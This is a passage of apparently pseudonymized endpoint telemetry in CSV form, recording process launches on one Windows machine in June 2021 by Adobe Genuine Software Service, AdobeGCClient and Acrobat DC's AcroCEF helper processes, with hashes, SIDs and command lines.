00:55:36.376051200+00:00,ec3d73bc-c2ba-4b70-9935-4f93d243721e,computerpii_0a470890c60768167990033d701e7bd881398861,169216,False,10.7740.19041.1052,False,11540474045136991,,11540474045175345,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility
+730,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:48.178799800+00:00,20696,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:54:48.170466+00:00,19712,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_tppgaa 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:48.202527900+00:00,2021-06-24 00:55:36.376105300+00:00,defaaf4f-2644-4e0c-92ab-ccda59f56371,computerpii_0a470890c60768167990033d701e7bd881398861,169217,False,10.7740.19041.1052,False,11540474045175344,,11540474045175346,2021-06-24 00:54:48.170466+00:00,19712,2021-06-24 00:54:48.170466+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,19712,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-24 00:54:47.340761600+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+731,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:48.189721700+00:00,17824,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:54:48.177541+00:00,20236,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a09448"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a09448""",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:48.203222500+00:00,2021-06-24 00:55:36.376154300+00:00,fb7e2bfd-c0b9-40c8-899a-652a569e529e,computerpii_0a470890c60768167990033d701e7bd881398861,169218,False,10.7740.19041.1052,False,11540474045175345,,11540474045175347,2021-06-24 00:54:48.177541+00:00,20236,2021-06-24 00:54:48.177541+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,20236,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-24 00:54:48.179257800+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+732,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:48.246800500+00:00,5820,AdobeGCClient.exe,"""AdobeGCClient.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a09448"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a09448""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AdobeGCClient.exe,6743752,99b696fe03a14bd322f39fc35827e487,b57aab0a87e6c85ddf061a0a10bc10b96c61ae827fbb61f514a1df9fffcf263f,43d2475f42eeacb434b632975a33ebc8979a95b3,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:54:48.177541+00:00,20236,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a09448"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a09448""",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:48.914577600+00:00,2021-06-24 00:55:36.376738300+00:00,95ee081b-7b79-4e61-8d94-a216a30401bb,computerpii_0a470890c60768167990033d701e7bd881398861,169229,False,10.7740.19041.1052,False,11540474045175345,,11540474045175348,2021-06-24 00:54:48.177541+00:00,20236,2021-06-24 00:54:48.177541+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,20236,128,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-24 00:54:48.179257800+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClient,AdobeGCClient.exe,Adobe GC Client Application
+733,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:49.598980300+00:00,4388,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:54:46.500445500+00:00,16132,Acrobat.exe,"""Acrobat.exe"" /l /act",False,2021-06-24 00:52:40.477041800+00:00,18820,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:49.845169400+00:00,2021-06-24 00:55:36.377167800+00:00,8a055c59-b230-4a47-863d-a40c7fcf1a7e,computerpii_0a470890c60768167990033d701e7bd881398861,169237,False,10.7740.19041.1052,False,11540474045175337,,11540474045175349,2021-06-24 00:54:46.500445500+00:00,16132,2021-06-24 00:54:46.500445500+00:00,Acrobat.exe,16132,256,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,3796704,2021-05-28 05:30:12+00:00,2021-05-28 05:58:58+00:00,2021-06-24 00:54:46.501046200+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC ,,,,,,
+734,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:50.940292200+00:00,13012,AcroCEF.exe,"""AcroCEF.exe"" --type=renderer --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --touch-events=enabled --field-trial-handle=1880,473395046125261807,10820757934777520507,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-gpu-compositing --lang=en-US --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=11062181095813689151 --renderer-client-id=2 --mojo-platform-channel-handle=1876 --allow-no-sandbox-job /prefetch:1",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:54:49.598980300+00:00,4388,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-24 00:54:46.500445500+00:00,16132,Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:50.972540700+00:00,2021-06-24 00:55:36.378892700+00:00,359821ba-bcba-42ea-9ad0-590d70b8ab72,computerpii_0a470890c60768167990033d701e7bd881398861,169269,False,10.7740.19041.1052,False,11540474045175349,,11540474045175350,2021-06-24 00:54:49.598980300+00:00,4388,2021-06-24 00:54:49.598980300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,4388,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-24 00:54:49.597907500+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+735,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:50.947061400+00:00,11764,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1880,473395046125261807,10820757934777520507,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=7325456600048995951 --mojo-platform-channel-handle=1896 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:54:49.598980300+00:00,4388,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-24 00:54:46.500445500+00:00,16132,Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:50.973101400+00:00,2021-06-24 00:55:36.378942+00:00,345bcbd5-d1b8-45bc-b075-8f98068838b0,computerpii_0a470890c60768167990033d701e7bd881398861,169270,False,10.7740.19041.1052,False,11540474045175349,,11540474045175351,2021-06-24 00:54:49.598980300+00:00,4388,2021-06-24 00:54:49.598980300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,4388,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-24 00:54:49.597907500+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+736,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:51.019266300+00:00,16068,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1880,473395046125261807,10820757934777520507,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=1377864173898182384 --mojo-platform-channel-handle=2220 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:54:49.598980300+00:00,4388,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-24 00:54:46.500445500+00:00,16132,Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:51.029680100+00:00,2021-06-24 00:55:36.379242800+00:00,bb9d1a6e-c31d-4b6b-bb74-305479802269,computerpii_0a470890c60768167990033d701e7bd881398861,169276,False,10.7740.19041.1052,False,11540474045175349,,11540474045175352,2021-06-24 00:54:49.598980300+00:00,4388,2021-06-24 00:54:49.598980300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,4388,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-24 00:54:49.597907500+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+737,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:51.073182300+00:00,1180,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1880,473395046125261807,10820757934777520507,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=7066556765313770963 --mojo-platform-channel-handle=2352 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:54:49.598980300+00:00,4388,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-24 00:54:46.500445500+00:00,16132,Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:51.098273200+00:00,2021-06-24 00:55:36.379646500+00:00,6afacf16-9965-4666-b808-84c44b116872,computerpii_0a470890c60768167990033d701e7bd881398861,169284,False,10.7740.19041.1052,False,11540474045175349,,11540474045175353,2021-06-24 00:54:49.598980300+00:00,4388,2021-06-24 00:54:49.598980300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,4388,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-24 00:54:49.597907500+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
